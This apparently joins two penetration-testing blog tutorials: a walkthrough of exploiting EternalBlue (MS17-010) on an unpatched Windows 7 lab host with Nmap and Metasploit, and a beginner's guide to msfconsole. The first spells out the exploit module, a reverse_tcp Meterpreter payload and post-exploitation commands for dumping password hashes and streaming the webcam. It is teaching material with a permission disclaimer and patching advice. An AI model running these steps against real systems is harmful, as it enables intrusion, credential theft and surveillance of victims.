This critical Windows exploit played a key role in the widespread WannaCry ransomware attack that affected systems in over 150 countries.

In this article, we’ll walk through how EternalBlue works, how to scan for it, and how to exploit it using Metasploit.

Note*: This is strictly for ethical hacking and penetration testing purposes on systems you own or have explicit permission to test. Do not use these tools on machines where you don’t have permission.*

What Is EternalBlue?

EternalBlue is a dangerous computer exploit developed by the U.S. National Security Agency (NSA). In 2017, a hacking group called the Shadow Brokers leaked it online. Hackers quickly started using it to attack computers worldwide.

EternalBlue takes advantage of a weakness in Windows computers. This weakness is in the SMB (Server Message Block) protocol, which helps computers share files and printers over a network. By exploiting this flaw, hackers can break into a system without needing a password.

One of the most famous cyberattacks using EternalBlue was WannaCry. This was a ransomware attack that spread across the world in May 2017. It infected over 200,000 computers in more than 150 countries, locking up files and demanding payment. Another attack, NotPetya, used EternalBlue to cause billions of dollars in damage.

Now lets look at how a machine vulnerable to EternalBlue can be exploited.

Prerequisites

1. A target Windows system vulnerable to EternalBlue (for example, an unpatched Windows 7 system).

2. An attacking system (often Kali Linux) with Metasploit installed.

3. Familiarity with basic pentesting commands (Nmap, Metasploit, and so on).

Tools You’ll Need

We are going to use two tools in this tutorial.

Nmap (Network Mapper) is a tool used to scan networks and discover devices, open ports, and running services. It helps ethical hackers and system administrators find security weaknesses and map out network structures. Here is a full tutorial on Nmap.

Metasploit is a powerful hacking framework used to test security by finding and exploiting vulnerabilities in computer systems. It includes Meterpreter, an advanced payload that gives hackers remote control over a compromised machine. Here is a full tutorial on Metasploit.

Identify the Target and Check for Open Ports

First, get the IP address of your target machine. In our example, the IP is 10.10.232.162. You’ll want to confirm that SMB (port 445) is open because EternalBlue attacks the SMB service.

nmap -p 445 10.10.232.162

If the port is open, Nmap will report that port 445 is open. That’s your first green light.

Start Metasploit

Open up your terminal and start the Metasploit Framework (you can learn more about Metasploit in my article here if you need a refresher):

msfconsole

Metasploit will load, displaying the number of exploits, auxiliary modules, and payloads available.

Scan for the EternalBlue (MS17–010) Vulnerability

Next, use Metasploit’s built-in scanner for EternalBlue:

search scanner eternalblue

Use the smb_ms17_010 scanner to check for the EternalBlue vulnerability.

use auxiliary/scanner/smb/smb_ms17_010
show options

Set the target’s IP address (RHOSTS) to your Windows machine:

set RHOSTS 10.10.217.189

Then, run the scanner:

run

If the scanner reports that the host is “likely vulnerable” and shows details such as Windows 7 Professional, you’ve confirmed the EternalBlue vulnerability.

Exploit the Vulnerability

Once you know the target is vulnerable, search for the actual EternalBlue exploit module:

search exploit eternalblue

You should see a list of possible exploits. The one we’re interested in is typically labelled something like:

exploit/windows/smb/ms17_010_eternalblue

Use that exploit:

use exploit/windows/smb/ms17_010_eternalblue
show options

Set the target’s IP address again:

set RHOSTS 10.10.217.189

Then check the payload settings. Metasploit often defaults to a Meterpreter payload (for example, windows/x64/meterpreter/reverse_tcp), which is ideal. Confirm that your local IP (LHOST) is correct, so the connection can come back to your machine.

Finally, run the exploit:

run

Meterpreter Shell and Post-Exploitation

If successful, you will land in a Meterpreter shell. Meterpreter is a powerful payload that allows you to:

• Dump password hashes

• Elevate privileges

• Capture webcam streams

• Record microphones, and more.

Here’s a quick look at some Meterpreter commands:

sysinfo         # Displays the target system information
getuid          # Shows the user context you’re running under
hashdump        # Dumps SAM password hashes (requires privilege escalation)
webcam_stream   # Streams from the target’s webcam if available

The EternalBlue exploit is a prime example of how a single unpatched vulnerability can expose a system for takeover.

Understanding its mechanics helps defensive teams patch systems, monitor network traffic for suspicious SMB communications, and create robust response strategies.

Conclusion

EternalBlue remains one of the most notable Windows vulnerabilities, illustrating the importance of patching and cybersecurity hygiene. From scanning with Nmap to exploiting with Metasploit, the process follows a typical penetration testing workflow: scan for holes, identify vulnerabilities, exploit, and escalate.

Hackers use EternalBlue to spread malware, create botnets, and steal data. Cybersecurity experts recommend updating Windows, disabling SMBv1, and using strong firewalls to stay protected.

Microsoft released a patch (a security update) in March 2017 to fix the issue. However, many computers were not updated, making them easy targets for hackers. Even today, some systems remain unpatched and at risk.

For video tutorials on Cybersecurity, check out my YouTube channel. To get some hands on experience with Eternal Blue and similar vulnerabilities, check out this Security Starter course.

Metasploit is one of the most versatile tools in cybersecurity. It helps simplify vulnerability testing and exploitation.

Metasploit helps us find and fix weaknesses before malicious actors exploit them. In this tutorial, you’ll learn what Metasploit is, why it’s useful, and how to use it.

What is Metasploit?

Metasploit is an open-source framework for penetration testing.

You can use it to find vulnerabilities, exploit them, and get access to the target.

Metasploit provides a collection of exploits, payloads, and helper tools. It’s often called the “Swiss army knife” for pen testers.

Instead of writing your own scripts to exploit vulnerabilities, Metasploit gives you pre-built modules to automate a lot of your work.

A module is a piece of code that performs an action. These actions can include scanning, exploitation, or anything that helps to simplify a pen-test.

Why is Metasploit Useful for Penetration Testers?

Pentesters try to attack networks, applications, and systems to check their security. Metasploit helps make this job easier in several ways.

First, it simplifies exploitation. Metasploit has a large library of exploits that allows us to attack known weaknesses in software and systems quickly.

Next, it helps with reconnaissance and scanning. Metasploit’s scanning tools gather information about a target, such as open ports, running services, and likely vulnerabilities.

After breaking in, Metasploit provides post-exploitation features. Tools like Meterpreter let pentesters keep access, collect data, and test defenses further.

Metasploit is also very flexible. We can build or change modules to fit our specific needs.

In short, Metasploit lets us do complete security tests, from finding vulnerabilities to exploiting them.

What Are Metasploit Auxiliaries?

Auxiliary modules are helper tools within Metasploit that perform tasks other than exploitation.

They’re used for reconnaissance, scanning, brute-forcing and more. These flexible modules can help you gather valuable information about a target.

For example, an auxiliary module can scan a network for open ports, check for vulnerable services, or attempt a brute-force login on an application.

Here is a sample list of auxiliaries from metasploit:

You can see that Metasploit has a range of auxiliaries, from scanners to brute-force modules, which help reveal and exploit security gaps.

What Are Metasploit Exploits?

Exploits are scripts or programs that take advantage of vulnerabilities in systems.

They help an attacker gain access or perform malicious activities. Metasploit’s library includes hundreds of exploits, covering a wide range of platforms and services.

For example, if a target system is running an outdated version of Samba, Metasploit may have an exploit specifically designed to exploit that vulnerability.

What Are Metasploit Payloads?

Payloads are scripts that run on the target system after an exploit has been successfully executed.

They determine what happens next — whether you open a reverse shell, add a backdoor, or perform another post-exploitation task.

There are two main types of payloads:

1. Single Payloads: These perform one task, such as creating a user account on the target.

2. Staged Payloads: These download a larger payload in stages, allowing for more complex actions.

One of the most commonly used payloads is windows/meterpreter/reverse_tcp, which gives you a command shell on the target system.

Pen testers and security experts use exploits to uncover weak points in networks and systems. By testing these gaps in a controlled way, they can find faults before attackers do. Once found, these flaws are fixed or patched to prevent harm. This approach helps protect data and keeps systems more secure.

What is Metasploit Meterpreter?

Meterpreter is an advanced, interactive payload within Metasploit. It allows you to interact with the target system after exploiting it.

Meterpreter is loaded directly into the target's memory, making it stealthier than traditional payloads.

Using Meterpreter, you can gather details about the operating system, transfer files between the attacker and target, and even execute commands directly on the target machine.

You can also set up a persistent backdoor to maintain access even after a system reboot.

Meterpreter is a powerful tool for post-exploitation activities, giving you complete control over the compromised system.

How to Work with msfconsole

Let's get some hands-on experience with Metasploit.

msfconsole is the command-line interface (CLI) for Metasploit. It’s the main way to interact with the framework.

Metasploit is pre-installed in Kali Linux. If you are using Kali Linux, you can find the installation instructions here.

After installing Metasploit, launch the console by typing:

msfconsole

Once it loads, you’ll see a prompt like this

This is where you’ll type commands to interact with Metasploit. Let’s try some basic commands to get you started.

Metasploit commands

1. help: If you’re unsure about what to do, start by typing help. This displays a list of available commands along with brief descriptions. For example:

2. search: The search command helps us to find specific modules, such as exploits or auxiliaries (helper modules). For example, if you’re looking for modules related to scanning, you’d type:

msf6 > search scanner

Metasploit will display all modules that match the keyword scanner.

3. info: You can use the info command to learn more about a module, including its options and how it works. For example:

msf6 > info auxiliary/scanner/portscan/tcp

4. use: To use an exploit or an auxiliary, we can simply type use along with the module name. Let's use the scanning module auxiliary/scanner/portscan/tcp which will scan for open TCP ports in a server.

msf6> use auxiliary/scanner/portscan/tcp

5. options: Once you have loaded a module with the use command, you can see the list of options using the options command. it will give you the list of options you can set for that module.

For example, the RHOSTS parameter is used to set the target IP address for scanning. scanme.nmap.org lets us run port scans on that server, so let's use that to run a scan.

Let’s grab the IP address of the server. We will issue a simple ping command to get the IP address of the server.

We can see that the IP address of the server is 45.33.32.156 (it can change when you run the ping command). Now let’s use this IP as our input for RHOSTS parameter. We will use the set command to set the IP address.

msf6 auxiliary(scanner/portscan/tcp)> set RHOSTS 45.33.32.156

6. run: To run a module, we use the run command. Now that we have set the target IP address, let's run the module to see if any ports are open.

As you can see, we have found 3 ports — 22,80 and 9929. Tools like Nmap are better for in-depth port scanning, but Metasploit offers modules for almost every segment of a cybersecurity audit.

7. exit: When you’re done using Metasploit, simply type exit to leave the console.

The msfconsole is user-friendly once you get the hang of these basic commands. Take your time exploring and experimenting with the help of the help command.

Conclusion

Metasploit is one of the most powerful tools in a penetration tester’s toolkit.

As you grow more familiar with Metasploit, you’ll unlock its full potential and gain deeper insights into how attackers exploit systems — and how you can defend against them. Keep learning, stay curious, and always use Metasploit responsibly!

Join our Weekly Newsletter for more tutorials on Ethical Hacking. For video tutorials on cybersecurity, check out our Youtube Channel.